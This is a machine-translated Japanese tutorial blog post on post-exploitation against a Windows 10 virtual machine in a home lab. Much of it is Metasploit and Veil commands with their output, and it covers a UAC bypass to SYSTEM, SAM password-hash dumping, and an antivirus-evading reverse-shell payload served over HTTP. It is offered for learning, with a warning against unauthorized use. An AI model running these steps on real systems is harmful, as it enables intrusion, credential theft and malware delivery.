Continued, first Windows 10 hacking

Introduction

It is the 15th day of the Advent calendar of PRO Co., Ltd. Sorry for the late posting ...! !! !!

This article is a continuation of "First Windows 10 Hacking". I will try to make you think "Is it possible to do this?" Even if you look at it alone, but if you want to try it yourself, Previous article / items / 1d035b0413ab60674ccb), please also.

things to do

Last time, I tried to attack and remotely control the target environment (Windows10) created by VM from the attack environment (Kali Linux) using a tool called Metasploit Framework (hereinafter, Metasploit). This time, let's experience some of the things to do after breaking into the target device.

--Taking screenshots --Acquisition of SYSTEM authority --Get the Windows password hash --Avoid antivirus virus detection

Here, it is assumed that the Meterpreter session has been established in advance (Previous article "Allowing the target terminal to be controlled from the attacking terminal" / 1d035b0413ab60674ccb #% E6% 94% BB% E6% 92% 83% E7% AB% AF% E6% 9C% AB% E3% 81% 8B% E3% 82% 89% E3% 82% BF% E3% 83% BC% E3% 82% B2% E3% 83% 83% E3% 83% 88% E7% AB% AF% E6% 9C% AB% E3% 82% 92% E5% 88% B6% E5% BE% A1% See E3% 81% A7% E3% 81% 8D% E3% 82% 8B% E3% 82% 88% E3% 81% 86% E3% 81% AB% E3% 81% 99% E3% 82% 8B)) ..

Caution!

This article is not intended to recommend unauthorized access. ** Never do what you introduce in someone else's environment **

Verification environment

Same as Last time.

--Host OS: macOS 10.15.2 Beta --Guest OS --Attack terminal: Kali Linux 5.3.0-kali2-amd64 --Target terminal: Windows 10 --Virtualization software: VirtualBox 6.0.14 r133895 (Qt5.6.3)

Terminal IP address
Kali Linux (attack terminal) 10.0.0.2
Windows10 (target terminal) 10.0.0.102

Take a screenshot

Enter the following command to take a picture of the screen currently displayed on the target terminal.

meterpreter > screenshot
Screenshot saved to: /root/ImgBawmm.jpeg

The red frame is a screenshot of the target device. スクリーンショット 2019-12-15 16.04.38.png

Get SYSTEM authority

If you do not have administrator privileges, various operations will be restricted, so you should elevate the privileges.

Attempts to elevate privileges with the getsystem command (failure)

Check the current permissions.

meterpreter > getuid
Server username: DESKTOP-4V3PT8F\arakawa

Meterpreter provides a getsystem command that attempts to elevate to SYSTEM privileges, but fails because the intruding user has low privileges.

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)

Try a module that bypasses UAC functionality

The getsystem command failed because it was blocked by the Windows User Account Control (UAC) feature, and it looks for a module to work around it.

First, bring the Meterpreter prompt to the background and back to the msf prompt.

meterpreter > background
[*] Backgrounding session 1..
msf5 exploit(multi/handler) > 

Check the connected session

msf5 exploit(multi/handler) > sessions -i

Active sessions
===============

  Id  Name  Type                     Information                                Connection
  --  ----  ----                     -----------                                ----------
  1         meterpreter x64/windows  DESKTOP-4V3PT8F\arakawa @ DESKTOP-4V3PT8F  10.0.0.2:4444 -> 10.0.0.102:50763 (10.0.0.102)

Search for modules with the keyword "bypassuac".

msf5 exploit(multi/handler) > search bypassuac

Matching Modules
================

   #   Name                                                   Disclosure Date  Rank       Check  Description
   -   ----                                                   ---------------  ----       -----  -----------
   0   exploit/windows/local/bypassuac                        2010-12-31       excellent  No     Windows Escalate UAC Protection Bypass
   1   exploit/windows/local/bypassuac_comhijack              1900-01-01       excellent  Yes    Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)
   2   exploit/windows/local/bypassuac_dotnet_profiler        2017-03-17       excellent  Yes    Windows Escalate UAC Protection Bypass (Via dot net profiler)
   3   exploit/windows/local/bypassuac_eventvwr               2016-08-15       excellent  Yes    Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)
   4   exploit/windows/local/bypassuac_fodhelper              2017-05-12       excellent  Yes    Windows UAC Protection Bypass (Via FodHelper Registry Key)
   5   exploit/windows/local/bypassuac_injection              2010-12-31       excellent  No     Windows Escalate UAC Protection Bypass (In Memory Injection)
   6   exploit/windows/local/bypassuac_injection_winsxs       2017-04-06       excellent  No     Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS
   7   exploit/windows/local/bypassuac_sdclt                  2017-03-17       excellent  Yes    Windows Escalate UAC Protection Bypass (Via Shell Open Registry Key)
   8   exploit/windows/local/bypassuac_silentcleanup          2019-02-24       excellent  No     Windows Escalate UAC Protection Bypass (Via SilentCleanup)
   9   exploit/windows/local/bypassuac_sluihijack             2018-01-15       excellent  Yes    Windows UAC Protection Bypass (Via Slui File Handler Hijack)
   10  exploit/windows/local/bypassuac_vbs                    2015-08-22       excellent  No     Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)
   11  exploit/windows/local/bypassuac_windows_store_filesys  2019-08-22       manual     Yes    Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe)
   12  exploit/windows/local/bypassuac_windows_store_reg      2019-02-19       manual     Yes    Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe) and Registry

Use the following modules to send Exploits through established sessions.

8 exploit/windows/local/bypassuac_silentcleanup 2019-02-24 excellent No Windows Escalate UAC Protection Bypass (Via SilentCleanup)

msf5 exploit(multi/handler) > use exploit/windows/local/bypassuac_silentcleanup   <----Use input module
msf5 exploit(windows/local/bypassuac_silentcleanup) > show targets  <----input

Exploit targets:

   Id  Name
   --  ----
   0   Microsoft Windows

msf5 exploit(windows/local/bypassuac_silentcleanup) > set TARGET 0   <----Input target set
TARGET => 0
msf5 exploit(windows/local/bypassuac_silentcleanup) > set SESSION 1   <----Input session set
SESSION => 1
msf5 exploit(windows/local/bypassuac_silentcleanup) > set payload windows/x64/meterpreter/reverse_tcp   <----Set the payload to be input
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/bypassuac_silentcleanup) > set LHOST 10.0.0.2   <----Input: Set the standby host
LHOST => 10.0.0.2
msf5 exploit(windows/local/bypassuac_silentcleanup) > show options   <----Input setting confirmation

Module options (exploit/windows/local/bypassuac_silentcleanup):

   Name       Current Setting                                          Required  Description
   ----       ---------------                                          --------  -----------
   PSH_PATH   %WINDIR%\System32\WindowsPowershell\v1.0\powershell.exe  yes       The path to the Powershell binary.
   SESSION    1                                                        yes       The session to run this module on.
   SLEEPTIME  0                                                        no        The time (ms) to sleep before running SilentCleanup


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.0.0.2         yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Windows


msf5 exploit(windows/local/bypassuac_silentcleanup) > exploit   <----Input execution

[*] Started reverse TCP handler on 10.0.0.2:4444 
[+] Part of Administrators group! Continuing...
[*] Sending stage (206403 bytes) to 10.0.0.102
[*] Meterpreter session 2 opened (10.0.0.2:4444 -> 10.0.0.102:50983) at 2019-12-15 18:17:57 +0900

meterpreter >    <--Success when the meterpreter prompt is returned

Try to elevate authority again with getsystem (success)

meterpreter > getuid
Server username: DESKTOP-4V3PT8F\arakawa   <--Normal user before execution
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM   <--SYSTEM authority

You now have SYSTEM privileges.

Get the password hash

One of the things you can do after you have the SYSTEM privilege is to get a password hash. The obtained hash is mainly used for password analysis of Windows. Password analysis will not be dealt with this time.

If it is a local account, the SAM database ("C: \ Windows \ System32 \ config \ SAM" file) manages logon authentication, and the password is recorded in hash format.

In Metasploit, you can get the password hash with the run hashdump command, but you will get an error if you do not have SYSTEM privileges.

meterpreter > run hashdump

[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.
[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...]
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY d1584c448032fe34d1e8e158d04561ed...
/usr/share/metasploit-framework/lib/rex/script/base.rb:134: warning: constant OpenSSL::Cipher::Cipher is deprecated
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...


<Password hash>

It is output in the part.

Avoid antivirus

Establish a Meterpreter session by avoiding virus detection by antivirus.

Create a payload that avoids antivirus in Veil

Install Veil Framework

Veil Framwwork (Veil) A group of tools that generate payloads that evade antivirus.

Veil is not available on Kali Linux, so install it separately.

root@kali:~# apt install veil-evasion

Launch Veil

Execute the following command with GUI login to Kali. Along the way, you will be asked if you want to install the dependencies, so select "s" (install in silent mode).

root@kali:~# veil
===============================================================================
                             Veil | [Version]: 3.1.12
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

Main Menu

	2 tools loaded

Available Tools:

	1)	Evasion
	2)	Ordnance

Available Commands:

	exit			Completely exit Veil
	info			Information on a specific tool
	list			List available tools
	options			Show Veil configuration
	update			Update Veil
	use			Use a specific tool

Veil>: 
 [!] ERROR #2-3: Can't find the WINE profile for Ruby v1.8.7 (/var/lib/veil/wine//drive_c/Ruby187/bin/ruby.exe).   Run: /usr/share/veil/config/setup.sh --force --silent

Create payload with Veil

Update Veil

Virus detection and evasion technologies are constantly being updated, so keep them updated to increase the success rate of evasion as much as possible.

Veil>: update
Hit:1 http://ftp.jaist.ac.jp/pub/Linux/kali kali-rolling InRelease
Reading package lists... Done
Reading package lists... Done
Building dependency tree       
Reading state information... Done
veil is already the newest version (3.1.12-0kali1).
veil set to manually installed.
0 upgraded, 0 newly installed, 0 to remove and 203 not upgraded.


Veil has checked for updates, press enter to continue

Select a tool

Two tools, Evasion and Ordnance, have been loaded, but I choose Evasion because it avoids virus detection.

Veil>: use 1
===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

Veil-Evasion Menu

	41 payloads loaded

Available Commands:

	back			Go to Veil's main menu
	checkvt			Check VirusTotal.com against generated hashes
	clean			Remove generated artifacts
	exit			Completely exit Veil
	info			Information on a specific payload
	list			List available payloads
	use			Use a specific payload

Select payload

Select "powershell / meterpreter / rev_tcp.py" which is the reverse shell for Windows from the list.

Veil/Evasion>: list   <--input
===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================


 [*] Available Payloads:

	1)	autoit/shellcode_inject/flat.py

	2)	auxiliary/coldwar_wrapper.py
<Omitted>
	22)	powershell/meterpreter/rev_tcp.py
<Omitted>
	41)	ruby/shellcode_inject/flat.py


Veil/Evasion>: use 22   <--input
===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

 Payload Information:

	Name:		Pure PowerShell Reverse TCP Stager
	Language:	powershell
	Rating:		Excellent
	Description:    pure windows/meterpreter/reverse_tcp stager, no
	                shellcode

Payload: powershell/meterpreter/rev_tcp selected

 Required Options:

Name            	Value   	Description
----            	-----   	-----------
BADMACS         	FALSE   	Checks for known bad mac addresses
DOMAIN          	X       	Optional: Required internal domain
HOSTNAME        	X       	Optional: Required system hostname
LHOST           	        	IP of the Metasploit handler
LPORT           	4444    	Port of the Metasploit handler
MINBROWSERS     	FALSE   	Minimum of 2 browsers
MINPROCESSES    	X       	Minimum number of processes running
MINRAM          	FALSE   	Require a minimum of 3 gigs of RAM
PROCESSORS      	X       	Optional: Minimum number of processors
SLEEP           	X       	Optional: Sleep "Y" seconds, check if accelerated
USERNAME        	X       	Optional: The required user account
USERPROMPT      	FALSE   	Window pops up prior to payload
UTCCHECK        	FALSE   	Check that system isn't using UTC time zone
VIRTUALPROC     	FALSE   	Check for known VM processes

 Available Commands:

	back        	Go back to Veil-Evasion
	exit        	Completely exit Veil
	generate    	Generate the payload
	options     	Show the shellcode's options
	set         	Set shellcode option

[powershell/meterpreter/rev_tcp>>]: set LHOST 10.0.0.2   <--Input Specify the attack terminal as the connection destination
[powershell/meterpreter/rev_tcp>>]: options   <--Input setting confirmation

<Omitted>

Payload creation

Create with the generate command.

[powershell/meterpreter/rev_tcp>>]: generate   <--input
===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

 [>] Please enter the base name for output files (default is payload): evil3   <--Specify the input payload name
<Omitted>

Exit Veil with the exit command and copy the payload you created to your desktop.

Veil/Evasion>: exit
root@kali:~# cp /var/lib/veil/output/source/evil3.bat /root/Desktop

Avoid real-time protection of Windows Defender

In the payload created by Metasploit, if Windows real-time protection is not disabled, it will be detected at download time and run time and the session cannot be established, but the payload created here can be downloaded and executed without being detected. (As of December 2009).

Allow the payload to be downloaded externally

Place the created payload in a folder that can be downloaded from the outside, and put it in the reverse shell standby state with meterpreter. Specify the payload as "windows / meterpreter / reverse_tcp".

root@kali:~# cp /root/Desktop/evil3.bat /var/www/html/share/ 
root@kali:~# service apache2 restart
root@kali:~# msfconsole
<Abbreviation>
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > 
msf5 exploit(multi/handler) > 
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.0.0.2
LHOST => 10.0.0.2
msf5 exploit(multi/handler) > exploit

Download payload

Download evil3.bat on the target device. It is not detected as a virus at this point.

スクリーンショット 2019-12-16 4.30.36.png

Run payload

evil3.bat Double-click to display a warning screen, but click Execute from the detailed information.

スクリーンショット 2019-12-16 4.31.32.png

If there is a reaction on the Kali side and the Meterpreter prompt is returned, it means that the session was established without being detected. If you do not receive a prompt, it may be blocked by some function of your security software.

Finally

This time, I had a hard time getting the SYSTEM authority, because the session was not established properly and veil did not start. Basically, it is prepared so that you can do anything with one command, and I thought it was easy, but if you do not understand the contents well, I feel that it has become difficult to deal with things that go wrong. It's scary that even such a person can do it relatively easily.

reference

[IPUSIRON "How to make a hacking lab: hacker experience learning in a virtual environment" Shoeisha (amazon)](https://www.amazon.co.jp/%E3%83%8F%E3%83%83%E3%82 % AD% E3% 83% B3% E3% 82% B0% E3% 83% BB% E3% 83% A9% E3% 83% 9C% E3% 81% AE% E3% 81% A4% E3% 81% 8F % E3% 82% 8A% E3% 81% 8B% E3% 81% 9F-% E4% BB% AE% E6% 83% B3% E7% 92% B0% E5% A2% 83% E3% 81% AB% E3% 81% 8A% E3% 81% 91% E3% 82% 8B% E3% 83% 8F% E3% 83% 83% E3% 82% AB% E3% 83% BC% E4% BD% 93% E9% A8% 93% E5% AD% A6% E7% BF% 92-IPUSIRON-ebook / dp / B07JJKLZNW) "How to make a hacking lab" support site FAQ for "hacker experience learning in a virtual environment"

Recommended Posts

Continued, first Windows 10 hacking
First Windows 10 hack